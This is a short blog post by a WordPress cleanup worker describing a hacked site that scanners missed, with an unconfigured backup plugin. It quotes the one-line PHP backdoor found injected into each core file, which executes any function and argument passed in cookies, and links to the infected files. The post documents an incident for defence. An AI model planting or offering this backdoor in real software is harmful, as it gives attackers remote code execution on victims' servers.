New WP Hack

So this new hit me pretty hard today. Normal WordPress hack I go through the plugins, see what’s infected, and work my way out. This time? Nope. Heck, even Google’s Safe Browsing Site Status came back as “Not Dangerous”. Online scanners came back clean, and was beginning to question what was what when, lo and behold in the Google SERP: This site may be hacked.

Something was amiss. The plugin CodeGuard was installed and activated. From their service: “When a change is detected, we will alert you and take a new backup of your database and site content.” There are a lot of backups in the site, and I wondered if the site owner was ever notified, or even cared. Upon closer inspection the API for the service was not set. 

All files were touched by the hack, the line:

if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);

added to each core file. index.php, .htaccess and file in root called post.php where altered/added respectively. Because of their size I put them up on github at: https://github.com/michalsen/hacked_files

Yep, this server was rooted.

132fc221677982e3b191f925ba38d889-tumblr_ms5j3aewyh1qg8holo1_500

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s